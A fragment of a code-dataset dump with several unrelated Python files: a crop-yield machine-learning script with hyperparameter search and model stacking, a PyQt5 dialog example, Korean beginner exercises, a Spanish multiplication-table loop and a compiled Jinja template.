selected_features = selected_features.append(pd.Series('Year'))\nX = X.loc[:,selected_features]\nx_test = x_test.loc[:,selected_features]\nselected_features.to_csv('RF_features_2018.csv')\n\n\n# CV\nkf = KFold(cv)\n\n\n\n ## ---------------- Bayesian Search ---------------- ##\n\n\nmax_evals = 20\n\ndef objective_LASSO(params):\n LASSO_df_B = pd.DataFrame()\n L1_B = Lasso()\n for train_index, test_index in kf.split(X):\n LASSO_B = L1_B.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n LASSO_df_B = pd.concat([LASSO_df_B, pd.DataFrame(LASSO_B.predict(np.array(X.drop(columns='Year'))[test_index]))])\n loss_LASSO = mse(data_d.Yield[(data_d.Year < 2018)], LASSO_df_B)\n return {'loss': loss_LASSO, 'params': params, 'status': STATUS_OK}\n\nspace_LASSO = {'alpha': hp.uniform('alpha', 10**-5, 1)}\ntpe_algorithm = tpe.suggest\ntrials_LASSO = Trials()\nbest_LASSO = fmin(fn=objective_LASSO, space=space_LASSO, algo=tpe.suggest,\n max_evals=max_evals, trials=trials_LASSO, rstate=np.random.RandomState(1369))\nLASSO_param_B = pd.DataFrame({'alpha': []})\nfor i in range(max_evals):\n LASSO_param_B.alpha[i] = trials_LASSO.results[i]['params']['alpha']\nLASSO_param_B = pd.DataFrame(LASSO_param_B.alpha)\n\n\n\ndef objective_XGB(params):\n XGB_df_B = pd.DataFrame()\n X1_B = XGBRegressor(objective='reg:squarederror', **params)\n for train_index, test_index in kf.split(X):\n XGB_B = X1_B.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n XGB_df_B = pd.concat([XGB_df_B, pd.DataFrame(X1_B.predict(np.array(X.drop(columns='Year'))[test_index]))])\n loss_XGB = mse(data_d.Yield[(data_d.Year < 2018)], XGB_df_B)\n return {'loss': loss_XGB, 'params': params, 'status': STATUS_OK}\n\nspace_XGB = {'gamma': hp.uniform('gamma', 0, 1),\n 'learning_rate': hp.uniform('learning_rate', 0.001, 0.5),\n 'n_estimators': hp.choice('n_estimators', [100, 300, 500, 1000]),\n 'max_depth': hp.choice('max_depth', [int(x) for x in np.arange(3, 20, 1)])}\ntpe_algorithm = tpe.suggest\ntrials_XGB = Trials()\nbest_XGB = fmin(fn=objective_XGB, space=space_XGB, algo=tpe.suggest,\n max_evals=max_evals, trials=trials_XGB, rstate=np.random.RandomState(1369))\nXGB_param_B = pd.DataFrame({'gamma': [], 'learning_rate': [], 'n_estimators': [], 'max_depth': []})\nfor i in range(max_evals):\n XGB_param_B.gamma[i] = trials_XGB.results[i]['params']['gamma']\n XGB_param_B.learning_rate[i] = trials_XGB.results[i]['params']['learning_rate']\n XGB_param_B.n_estimators[i] = trials_XGB.results[i]['params']['n_estimators']\n XGB_param_B.max_depth[i] = trials_XGB.results[i]['params']['max_depth']\nXGB_param_B = pd.DataFrame({'gamma': XGB_param_B.gamma,\n 'learning_rate': XGB_param_B.learning_rate,\n 'n_estimators': XGB_param_B.n_estimators,\n 'max_depth': XGB_param_B.max_depth})\n\n\ndef objective_LGB(params):\n LGB_df_B = pd.DataFrame()\n G1_B = LGBMRegressor(objective='regression', **params)\n for train_index, test_index in kf.split(X):\n LGB_B = G1_B.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n LGB_df_B = pd.concat([LGB_df_B, pd.DataFrame(G1_B.predict(np.array(X.drop(columns='Year'))[test_index]))])\n loss_LGB = mse(data_d.Yield[(data_d.Year < 2018)], LGB_df_B)\n return {'loss': loss_LGB, 'params': params, 'status': STATUS_OK}\n\nspace_LGB = {'num_leaves': hp.choice('num_leaves', [int(x) for x in np.arange(5, 40, 2)]),\n 'learning_rate': hp.uniform('learning_rate', 0.1, 0.5),\n 'n_estimators': hp.choice('n_estimators', [500, 1000, 1500, 2000])}\ntpe_algorithm = tpe.suggest\ntrials_LGB = Trials()\nbest_LGB = fmin(fn=objective_LGB, space=space_LGB, algo=tpe.suggest,\n max_evals=max_evals, trials=trials_LGB, rstate=np.random.RandomState(1369))\nLGB_param_B = pd.DataFrame({'num_leaves': [], 'learning_rate': [], 'n_estimators': []})\nfor i in range(max_evals):\n LGB_param_B.num_leaves[i] = trials_LGB.results[i]['params']['num_leaves']\n LGB_param_B.learning_rate[i] = trials_LGB.results[i]['params']['learning_rate']\n LGB_param_B.n_estimators[i] = trials_LGB.results[i]['params']['n_estimators']\nLGB_param_B = pd.DataFrame({'num_leaves': LGB_param_B.num_leaves,\n 'learning_rate': LGB_param_B.learning_rate,\n 'n_estimators': LGB_param_B.n_estimators})\n\n\ndef objective_RF(params):\n RF_df_B = pd.DataFrame()\n R1_B = RandomForestRegressor(**params)\n for train_index, test_index in kf.split(X):\n RF_B = R1_B.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n RF_df_B = pd.concat([RF_df_B, pd.DataFrame(R1_B.predict(np.array(X.drop(columns='Year'))[test_index]))])\n loss_RF = mse(data_d.Yield[(data_d.Year < 2018)], RF_df_B)\n return {'loss': loss_RF, 'params': params, 'status': STATUS_OK}\n\nspace_RF = {'n_estimators': hp.choice('n_estimators', [100, 200, 300, 500]),\n 'max_depth': hp.choice('max_depth', [int(x) for x in np.arange(5, 41, 5)])}\ntpe_algorithm = tpe.suggest\ntrials_RF = Trials()\nbest_RF = fmin(fn=objective_RF, space=space_RF, algo=tpe.suggest,\n max_evals=max_evals, trials=trials_RF, rstate=np.random.RandomState(1369))\nRF_param_B = pd.DataFrame({'n_estimators': [], 'max_depth': []})\nfor i in range(max_evals):\n RF_param_B.n_estimators[i] = trials_RF.results[i]['params']['n_estimators']\n RF_param_B.max_depth[i] = trials_RF.results[i]['params']['max_depth']\nRF_param_B = pd.DataFrame({'n_estimators': RF_param_B.n_estimators,\n 'max_depth': RF_param_B.max_depth})\n\n\n## ---------------- Permutation feature importance ---------------- ##\n\n\ndef perm_fi(model, cv, n_iter):\n perm = PermutationImportance(model, cv=cv, n_iter=n_iter).fit(X.drop(columns='Year'), Y)\n feature_importances = [(feature, importance) for feature, importance in zip(list(X.columns), list(np.abs(perm.feature_importances_)))]\n feature_importances = pd.DataFrame(sorted(feature_importances, key = lambda x: x[1], reverse = True))\n return feature_importances\n\n\n## ---------------- Building models ---------------- ##\nLASSO_df2 = pd.DataFrame()\nL2 = Lasso(alpha=trials_LASSO.best_trial['result']['params']['alpha'], random_state=1369)\nfor train_index, test_index in kf.split(X):\n L2.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n LASSO_df2 = pd.concat([LASSO_df2, pd.DataFrame(L2.predict(np.array(X.drop(columns='Year'))[test_index]))])\nLASSO_df2 = LASSO_df2.reset_index(drop=True)\nLASSO_mse2 = mse(data_d.Yield[(data_d.Year<2018)], LASSO_df2)\nLASSO = L2.fit(X.drop(columns='Year'), Y)\nLASSO_preds_test2 = LASSO.predict(x_test.drop(columns='Year'))\npd.DataFrame(LASSO_preds_test2).to_csv('LASSO_preds_test_2018.csv')\nLASSO_mse_test2 = mse(data_d.Yield[data_d.Year==2018], LASSO_preds_test2)\nLASSO_rmse_test2 = np.sqrt(LASSO_mse_test2)\nLASSO_preds_train = LASSO.predict(X.drop(columns='Year'))\npd.DataFrame(LASSO_preds_train).to_csv('LASSO_preds_train_2018.csv')\nLASSO_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], LASSO_preds_train))\nfeature_importances_lasso = perm_fi(L2, cv, 10)\nfeature_importances_lasso.to_csv('feature_importances_lasso_2018.csv')\n\n\n\n### ---------- XGB ------------ ###\nXGB_df2 = pd.DataFrame()\nX2 = XGBRegressor(objective='reg:squarederror',\n gamma=trials_XGB.best_trial['result']['params']['gamma'],\n learning_rate=trials_XGB.best_trial['result']['params']['learning_rate'],\n n_estimators=int(trials_XGB.best_trial['result']['params']['n_estimators']),\n max_depth=int(trials_XGB.best_trial['result']['params']['max_depth']), random_state=1369)\nfor train_index, test_index in kf.split(X):\n X2.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n XGB_df2 = pd.concat([XGB_df2, pd.DataFrame(X2.predict(np.array(X.drop(columns='Year'))[test_index]))])\nXGB_df2 = XGB_df2.reset_index(drop=True)\nXGB_mse2 = mse(data_d.Yield[(data_d.Year<2018)], XGB_df2)\nXGB = X2.fit(X.drop(columns='Year'), Y)\nXGB_preds_test2 = XGB.predict(x_test.drop(columns='Year'))\npd.DataFrame(XGB_preds_test2).to_csv('XGB_preds_test_2018.csv')\nXGB_mse_test2 = mse(data_d.Yield[data_d.Year==2018], XGB_preds_test2)\nXGB_rmse_test2 = np.sqrt(XGB_mse_test2)\nXGB_preds_train = XGB.predict(X.drop(columns='Year'))\npd.DataFrame(XGB_preds_train).to_csv('XGB_preds_train_2018.csv')\nXGB_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], XGB_preds_train))\nperm_xgb = PermutationImportance(X2, cv=cv, n_iter=10).fit(X.as_matrix(), Y.as_matrix())\nfeature_importances_xgb = [(feature, importance) for feature, importance in\n zip(list(X.columns), list(np.abs(perm_xgb.feature_importances_)))]\nfeature_importances_xgb = pd.DataFrame(sorted(feature_importances_xgb, key=lambda x: x[1], reverse=True))\nfeature_importances_xgb.to_csv('feature_importances_xgb_2018.csv')\n\n\n### ---------- LGB ------------ ###\nLGB_df2 = pd.DataFrame()\nG2 = LGBMRegressor(objective='regression', random_state=1369,\n num_leaves=int(trials_LGB.best_trial['result']['params']['num_leaves']),\n learning_rate=trials_LGB.best_trial['result']['params']['learning_rate'],\n n_estimators=int(trials_LGB.best_trial['result']['params']['n_estimators']))\nfor train_index, test_index in kf.split(X):\n G2.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n LGB_df2 = pd.concat([LGB_df2, pd.DataFrame(G2.predict(np.array(X.drop(columns='Year'))[test_index]))])\nLGB_df2 = LGB_df2.reset_index(drop=True)\nLGB_mse2 = mse(data_d.Yield[(data_d.Year<2018)], LGB_df2)\nLGB = G2.fit(X.drop(columns='Year'), Y)\nLGB_preds_test2 = LGB.predict(x_test.drop(columns='Year'))\npd.DataFrame(LGB_preds_test2).to_csv('LGB_preds_test_2018.csv')\nLGB_mse_test2 = mse(data_d.Yield[data_d.Year==2018], LGB_preds_test2)\nLGB_rmse_test2 = np.sqrt(LGB_mse_test2)\nLGB_preds_train = LGB.predict(X.drop(columns='Year'))\npd.DataFrame(LGB_preds_train).to_csv('LGB_preds_train_2018.csv')\nLGB_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], LGB_preds_train))\nfeature_importances_lgb = perm_fi(G2, cv, 10)\nfeature_importances_lgb.to_csv('feature_importances_lgb_2018.csv')\n\n\n### ---------- RF ------------ ###\nRF_df2 = pd.DataFrame()\nR2 = RandomForestRegressor(max_depth=int(trials_RF.best_trial['result']['params']['max_depth']),\n n_estimators=int(trials_RF.best_trial['result']['params']['n_estimators']), random_state=1369)\nfor train_index, test_index in kf.split(X):\n R2.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n RF_df2 = pd.concat([RF_df2, pd.DataFrame(R2.predict(np.array(X.drop(columns='Year'))[test_index]))])\nRF_df2 = RF_df2.reset_index(drop=True)\nRF_mse2 = mse(data_d.Yield[(data_d.Year<2018)], RF_df2)\nRF = R2.fit(X.drop(columns='Year'), Y)\nRF_preds_test2 = RF.predict(x_test.drop(columns='Year'))\npd.DataFrame(RF_preds_test2).to_csv('RF_preds_test_2018.csv')\nRF_mse_test2 = mse(data_d.Yield[data_d.Year==2018], RF_preds_test2)\nRF_rmse_test2 = np.sqrt(RF_mse_test2)\nRF_preds_train = RF.predict(X.drop(columns='Year'))\npd.DataFrame(RF_preds_train).to_csv('RF_preds_train_2018.csv')\nRF_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], RF_preds_train))\nfeature_importances_rf = perm_fi(R2, cv, 10)\nfeature_importances_rf.to_csv('feature_importances_rf_2018.csv')\n\n\n### ---------- LR ------------ ###\nLR_df2 = pd.DataFrame()\nlm2 = LinearRegression()\nlm2.fit(X.drop(columns='Year'),Y)\nfor train_index, test_index in kf.split(X):\n lm2.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n LR_df2 = pd.concat([LR_df2, pd.DataFrame(lm2.predict(np.array(X.drop(columns='Year'))[test_index]))])\nLR_df2 = LR_df2.reset_index(drop=True)\nLR_mse2 = mse(data_d.Yield[(data_d.Year<2018)], LR_df2)\nLR = lm2.fit(X.drop(columns='Year'), Y)\nLR_preds_test2 = LR.predict(x_test.drop(columns='Year'))\npd.DataFrame(LR_preds_test2).to_csv('LR_preds_test2_2018.csv')\nLR_mse_test2 = mse(data_d.Yield[data_d.Year==2018], LR_preds_test2)\nLR_rmse_test2 = np.sqrt(LR_mse_test2)\nLR_preds_train = LR.predict(X.drop(columns='Year'))\npd.DataFrame(LR_preds_train).to_csv('LR_preds_train_2018.csv')\nLR_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], LR_preds_train))\nfeature_importances_lr = perm_fi(lm2, cv, 10)\nfeature_importances_lr.to_csv('feature_importances_lr_2018.csv')\n\n\n\n## ---------------- Optimizing Ensembles ---------------- ##\n\ndef objective2(y):\n return mse(data_d.Yield[(data_d.Year<2018)],\n (y[0]*LASSO_df2 + y[1]*XGB_df2 + y[2]*LGB_df2 + y[3]*RF_df2 + y[4]*LR_df2))\n\ndef constraint12(y):\n return y[0] + y[1] + y[2] + y[3] + y[4] - 1.0\ndef constraint22(y):\n return LASSO_mse2 - objective2(y)\ndef constraint32(y):\n return XGB_mse2 - objective2(y)\ndef constraint42(y):\n return LGB_mse2 - objective2(y)\ndef constraint52(y):\n return RF_mse2 - objective2(y)\ndef constraint62(y):\n return LR_mse2 - objective2(y)\n\n\ny0 = np.zeros(5)\ny0[0] = 1 / 5\ny0[1] = 1 / 5\ny0[2] = 1 / 5\ny0[3] = 1 / 5\ny0[4] = 1 / 5\n\nb = (0, 1.0)\nbnds2 = (b, b, b, b, b)\ncon12 = {'type': 'eq', 'fun': constraint12}\ncon22 = {'type': 'ineq', 'fun': constraint22}\ncon32 = {'type': 'ineq', 'fun': constraint32}\ncon42 = {'type': 'ineq', 'fun': constraint42}\ncon52 = {'type': 'ineq', 'fun': constraint52}\ncon62 = {'type': 'ineq', 'fun': constraint62}\n\ncons2 = [con12, con22, con32, con42, con52, con62]\n\nsolution2 = minimize(objective2, y0, method='SLSQP',\n options={'disp': True, 'maxiter': 3000, 'eps': 1e-3}, bounds=bnds2,\n constraints=cons2)\ny = solution2.x\n\ncowe_preds_test = y[0]*LASSO_preds_test2 + y[1]*XGB_preds_test2 + y[2]*LGB_preds_test2 + y[3]*RF_preds_test2 + y[4]*LR_preds_test2\ncowe_mse_test = mse(data_d.Yield[data_d.Year==2018], cowe_preds_test)\ncowe_rmse_test = np.sqrt(cowe_mse_test)\npd.DataFrame(cowe_preds_test).to_csv('cowe_preds_test_2018.csv')\ncowe_preds_train = y[0]*LASSO_preds_train + y[1]*XGB_preds_train + y[2]*LGB_preds_train + y[3]*RF_preds_train + y[4]*LR_preds_train\npd.DataFrame(cowe_preds_train).to_csv('cowe_preds_train_2018.csv')\ncowe_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], cowe_preds_train))\n\n\ncowe_preds_CV = y[0]*LASSO_df2 + y[1]*XGB_df2 + y[2]*LGB_df2 + y[3]*RF_df2 + y[4]*LR_df2\ncowe_mse_CV = mse(data_d.Yield[(data_d.Year<2018)], cowe_preds_CV)\ncowe_rmse_CV = np.sqrt(cowe_mse_CV)\n\n\ncls_preds_test = y0[0]*LASSO_preds_test2 + y0[1]*XGB_preds_test2 + y0[2]*LGB_preds_test2 + y0[3]*RF_preds_test2 + y0[4]*LR_preds_test2\ncls_mse_test = mse(data_d.Yield[data_d.Year==2018], cls_preds_test)\ncls_rmse_test = np.sqrt(cls_mse_test)\npd.DataFrame(cls_preds_test).to_csv('cls_preds_test_2018.csv')\ncls_preds_train = y0[0]*LASSO_preds_train + y0[1]*XGB_preds_train + y0[2]*LGB_preds_train + y0[3]*RF_preds_train + y0[4]*LR_preds_train\npd.DataFrame(cls_preds_train).to_csv('cls_preds_train_2018.csv')\ncls_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], cls_preds_train))\n\n\ncls_preds_CV = y0[0]*LASSO_df2 + y0[1]*XGB_df2 + y0[2]*LGB_df2 + y0[3]*RF_df2 + y0[4]*LR_df2\ncls_mse_CV = mse(data_d.Yield[(data_d.Year<2018)], cls_preds_CV)\ncls_rmse_CV = np.sqrt(cls_mse_CV)\n\n\n\n## -------------------------------- STACKING -------------------------------- ##\n\npredsDF2 = pd.DataFrame()\npredsDF2['LASSO'] = LASSO_df2[0]\npredsDF2['XGB']= XGB_df2[0]\npredsDF2['LGB'] = LGB_df2[0]\npredsDF2['RF'] = RF_df2[0]\npredsDF2['LR'] = LR_df2[0]\npredsDF2['Y'] = data_d.Yield[(data_d.Year < 2018)].reset_index(drop=True)\nx_stacked2 = predsDF2.drop(columns='Y', axis=1)\ny_stacked2 = predsDF2['Y']\ntestPreds2 = pd.DataFrame([LASSO_preds_test2, XGB_preds_test2, LGB_preds_test2, RF_preds_test2, LR_preds_test2]).T\ntestPreds2.columns = ['LASSO', 'XGB', 'LGB', 'RF', 'LR']\n\n\nstck_reg2 = LinearRegression()\nstck_reg2.fit(x_stacked2, y_stacked2)\nstck_reg_preds_test2 = stck_reg2.predict(testPreds2)\nstck_reg_mse_test2 = mse(data_d.Yield[data_d.Year == 2018], stck_reg_preds_test2)\nstck_reg_rmse_test2 = np.sqrt(stck_reg_mse_test2)\npd.DataFrame(stck_reg_preds_test2).to_csv('stck_reg_preds_test_2018.csv')\nstck_reg_preds_train = stck_reg2.predict(x_stacked2)\npd.DataFrame(stck_reg_preds_train).to_csv('stck_reg_preds_train_2018.csv')\nstck_reg_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year < 2018], stck_reg_preds_train))\n\nstck_lasso2 = Lasso()\nstck_lasso2.fit(x_stacked2, y_stacked2)\nstck_lasso_preds_test2 = stck_lasso2.predict(testPreds2)\nstck_lasso_mse_test2 = mse(data_d.Yield[data_d.Year == 2018], stck_lasso_preds_test2)\nstck_lasso_rmse_test2 = np.sqrt(stck_lasso_mse_test2)\npd.DataFrame(stck_lasso_preds_test2).to_csv('stck_lasso_preds_test_2018.csv')\nstck_lasso_preds_train = stck_lasso2.predict(x_stacked2)\npd.DataFrame(stck_lasso_preds_train).to_csv('stck_lasso_preds_train_2018.csv')\nstck_lasso_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year < 2018], stck_lasso_preds_train))\n\nstck_rf2 = RandomForestRegressor()\nstck_rf2.fit(x_stacked2, y_stacked2)\nstck_rf_preds_test2 = stck_rf2.predict(testPreds2)\nstck_rf_mse_test2 = mse(data_d.Yield[data_d.Year == 2018], stck_rf_preds_test2)\nstck_rf_rmse_test2 = np.sqrt(stck_rf_mse_test2)\npd.DataFrame(stck_rf_preds_test2).to_csv('stck_rf_preds_test_2018.csv')\nstck_rf_preds_train = stck_rf2.predict(x_stacked2)\npd.DataFrame(stck_rf_preds_train).to_csv('stck_rf_preds_train_2018.csv')\nstck_rf_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year < 2018], stck_rf_preds_train))\n\nstck_lgb2 = LGBMRegressor()\nstck_lgb2.fit(x_stacked2, y_stacked2)\nstck_lgb_preds_test2 = stck_lgb2.predict(testPreds2)\nstck_lgb_mse_test2 = mse(data_d.Yield[data_d.Year == 2018], stck_lgb_preds_test2)\nstck_lgb_rmse_test2 = np.sqrt(stck_lgb_mse_test2)\npd.DataFrame(stck_lgb_preds_test2).to_csv('stck_lgb_preds_test_2018.csv')\nstck_lgb_preds_train = stck_lgb2.predict(x_stacked2)\npd.DataFrame(stck_lgb_preds_train).to_csv('stck_lgb_preds_train_2018.csv')\nstck_lgb_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year < 2018], stck_lgb_preds_train))\n\n\n\n## -------------------------- RESULTS -------------------------- ##\n\n\ntest_results = pd.DataFrame(data={'model':['RMSE'],'LASSO':[LASSO_rmse_test2], 'XGB':[XGB_rmse_test2], 'LGB':[LGB_rmse_test2],\n 'RF': [RF_rmse_test2], 'LR': [LR_rmse_test2],\n 'COWE': [cowe_rmse_test], 'Classical': [cls_rmse_test],\n 'stck_reg': [stck_reg_rmse_test2], 'stck_lasso': [stck_lasso_rmse_test2],\n 'stck_rf': [stck_rf_rmse_test2], 'stck_lgb': [stck_lgb_rmse_test2]})\n\ntrain_results = pd.DataFrame(data={'model':['RMSE'],'LASSO':[LASSO_rmse_train], 'XGB':[XGB_rmse_train], 'LGB':[LGB_rmse_train],\n 'RF': [RF_rmse_train], 'LR': [LR_rmse_train],\n 'COWE': [cowe_rmse_train], 'Classical': [cls_rmse_train],\n 'stck_reg': [stck_reg_rmse_train], 'stck_lasso': [stck_lasso_rmse_train],\n 'stck_rf': [stck_rf_rmse_train], 'stck_lgb': [stck_lgb_rmse_train]})\n\nCV_results = pd.DataFrame(data={'model':['RMSE'], 'LASSO':[np.sqrt(LASSO_mse2)], 'XGB':[np.sqrt(XGB_mse2)],\n 'LGB':[np.sqrt(LGB_mse2)], 'RF': [np.sqrt(RF_mse2)], 'LR': [np.sqrt(LR_mse2)],\n 'COWE': [cowe_rmse_CV],\n 'Classical':[cls_rmse_CV]})\n\ntest_results.to_csv('2018_test.csv')\ntrain_results.to_csv('2018_train.csv')\nCV_results.to_csv('2018_CV.csv')\n","repo_name":"mohsenshahhosseini/Coupling-ML-with-Crop-Modeling","sub_path":"2018.py","file_name":"2018.py","file_ext":"py","file_size_in_byte":27304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"21843902901","text":"# -*- coding: utf-8 -*-\n\n'''\n 【简介】\n 对话框关闭时返回值给主窗口例子\n'''\n\nimport sys\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom DateDialog2 import DateDialog\n\n\nclass WinForm(QWidget):\n def __init__(self, parent=None):\n super(WinForm, self).__init__(parent)\n self.resize(400, 90)\n self.setWindowTitle('信号与槽传递参数的示例')\n\n self.open_btn = QPushButton('获取时间')\n self.lineEdit_inner = QLineEdit(self)\n self.lineEdit_emit = QLineEdit(self)\n self.open_btn.clicked.connect(self.openDialog)\n\n self.lineEdit_inner.setText('接收子窗口内置信号的时间')\n self.lineEdit_emit.setText('接收子窗口自定义信号的时间')\n\n grid = QGridLayout()\n grid.addWidget(self.lineEdit_inner)\n grid.addWidget(self.lineEdit_emit)\n\n grid.addWidget(self.open_btn)\n self.setLayout(grid)\n\n def openDialog(self):\n dialog = DateDialog(self)\n '''连接子窗口的内置信号与主窗口的槽函数'''\n dialog.datetime_inner.dateTimeChanged.connect(self.deal_inner_slot)\n '''连接子窗口的自定义信号与主窗口的槽函数'''\n dialog.Signal_OneParameter.connect(self.deal_emit_slot)\n dialog.show()\n\n def deal_inner_slot(self, date):\n self.lineEdit_inner.setText(date.toString())\n\n\n def deal_emit_slot(self, dateStr):\n self.lineEdit_emit.setText(dateStr)\n\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n form = WinForm()\n form.show()\n sys.exit(app.exec_())\n","repo_name":"cxinping/PyQt5","sub_path":"Chapter07/transParam/CallDialogMainWin2.py","file_name":"CallDialogMainWin2.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":2140,"dataset":"github-code","pt":"16"}
+{"seq_id":"14964349050","text":"#Q1\n#주어진 자연수가 홀수인지 짝수인지 판별해 주는 함수(is_odd)를 작성해 보자.\ndef Q1():\n a = input(\"정수를 입력하세요\\n:\")\n a = int(a)\n if a % 2 == 1:\n print(\"홀수 입니다.\")\n else:\n print(\"짝수입니다.\")\n\n\n#Q2\n#입력으로 들어오는 모든 수의 평균 값을 계산해 주는 함수를 작성해 보자. (단 입력으로 들어오는 수의 개수는 정해져 있지 않다.)\n#※ 평균 값을 구할 때 len 함수를 사용해 보자.\n\ndef q2_input(): #input을 받아 리스트 형태로 li에 저장\n li = []\n i = 1\n while i != 100:\n b = int(input(\"정수를 입력하세요. (0을 입력하면 입력이 종료 됩니다.):\"))\n if b == 0: #input이 0 이라면 종료\n break\n else: #input이 정수라면 li에 추가\n li.append(b)\n return li\n\ndef q2_calculate(li): #리스트 li를 매개변수로 받아옴\n total = 0\n for c in li: #리스트의 원자를 하나씩 추출하여 total에 저장\n total = c + total\n avg = total / len(li)\n print(\"총 합은 :\\n\", total)\n print(\"평균은 :\")\n return avg\n\ndef Q2():\n li = q2_input()\n result = q2_calculate(li)\n print(result)\n return result\n\n#Q3\n#다음은 두 개의 숫자를 입력받아 더하여 돌려주는 프로그램이다.#이 프로그램을 수행해 보자.\n#첫번째 숫자를 입력하세요:3\n#두번째 숫자를 입력하세요:6\n#두 수의 합은 36 입니다\n#3과 6을 입력했을 때 9가 아닌 36이라는 결괏값을 돌려주었다. 이 프로그램의 오류를 수정해 보자.\n#※ int 함수를 사용해 보자.\ndef Q3():\n input1 = int(input(\"첫번째 숫자를 입력하세요:\"))\n input2 = int(input(\"두번째 숫자를 입력하세요:\"))\n total = input1 + input2\n print(\"두 수의 합은 %s 입니다\" % total)\n\n#Q4\n#다음 중 출력 결과가 다른 것 한 개를 골라 보자.\n#답 3번\ndef Q4():\n print(\"you\" \"need\" \"python\") #youneedpython\n print(\"you\"+\"need\"+\"python\") #youneedpython\n print(\"you\", \"need\", \"python\") #you need python\n print(\"\".join([\"you\", \"need\", \"python\"])) #youneedpython\n\n#Q5\n#다음은 \"test.txt\"라는 파일에 \"Life is too short\" 문자열을 저장한 후 다시 그 파일을 읽어서 출력하는 프로그램이다.\n#이 프로그램은 우리가 예상한 \"Life is too short\"라는 문장을 출력하지 않는다. 우리가 예상한 값을 출력할 수 있도록 프로그램을 수정해 보자.\n\n#답 : f1을 열어주고 닫는 구문이 없었음\ndef Q5():\n f1 = open(\"test.txt\", 'w')\n f1.write(\"Life is too short\")\n f1.close() #답 : 이 행을 추가\n f2 = open(\"test.txt\", 'r')\n print(f2.read())\n\n\n\n#Q6\n#사용자의 입력을 파일(test.txt)에 저장하는 프로그램을 작성해 보자. (단 프로그램을 다시 실행하더라도 기존에 작성한 내용을 유지하고 새로 입력한 내용을 추가해야 한다.)\ndef Q6():\n while True:\n a = input(\"텍스트 작성 : \")\n if a == '':\n print(\"종료\")\n break\n f1 = open(\"test.txt\", 'a')\n f1.write(a+\"\\n\")\n f1.close() #답 : 이 행을 추가\n f2 = open(\"test.txt\", 'r')\n print(f2.read())\n\n\n#Q7\n#다음과 같은 내용을 지닌 파일 test.txt가 있다. 이 파일의 내용 중 \"java\"라는 문자열을 \"python\"으로 바꾸어서 저장해 보자.\n#※ replace 함수를 사용해 보자.\n#Life is too short\n#you need java\ndef Q7():\n f = open('test.txt', 'r') #파일을 먼저 읽어 옴\n body = f.read() #읽어 온 파일을 body에 저장\n f.close()\n\n body = body.replace('java', 'python') #body값을 replace 함수로 값을 변경\n f = open('test.txt', 'w')\n f.write(body)\n f.close()\n f2 = open(\"test.txt\", 'r')\n print(f2.read())\n","repo_name":"Choijonghun/jhchoi_gitTest","sub_path":"4강_연습문제/Question.py","file_name":"Question.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"1641475849","text":"try:\n numero = int(input(\"Ingresa un número entero y positivo: \"))\nexcept:\n print(\"Número introducido inválido.\")\n exit()\n\ni = 0\n\nif numero <= 0:\n print(\"Número no válido\")\n exit()\n\nprint(\"--La tabla del {}--\".format(numero))\nwhile i < 10:\n i += 1\n print(\" {} * {} = {}\".format(numero , i , numero * i))","repo_name":"Adolfo-Cuevas28/Python_Adolf","sub_path":"11. Bucles/Ejercicio1While.py","file_name":"Ejercicio1While.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"30846784241","text":"from __future__ import division\nfrom jinja2.runtime import LoopContext, TemplateReference, Macro, Markup, TemplateRuntimeError, missing, concat, escape, markup_join, unicode_join, to_string, identity, TemplateNotFound\ndef run(environment):\n name = 'source/snippets/grids/landing.js'\n\n def root(context, environment=environment):\n if 0: yield None\n yield u\"\\njsonData = null\\n\\nfunction spiPreProcess(data)\\n{\\n\\tjsonData = data\\n\\n\\trecords = []\\n\\tfor (index in data.response.records)\\n\\t{\\n\\t\\trecords.push({'cell':[data.response.records[index].properties.title]});\\n\\t}\\n\\t\\n\\treturn {'total':records.length, 'page':1, 'rows':records};\\n}\"\n\n blocks = {}\n debug_info = ''\n return locals()","repo_name":"sgammon/StonerHub","sub_path":"templates/compiled/snippets/grids/landing.py","file_name":"landing.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
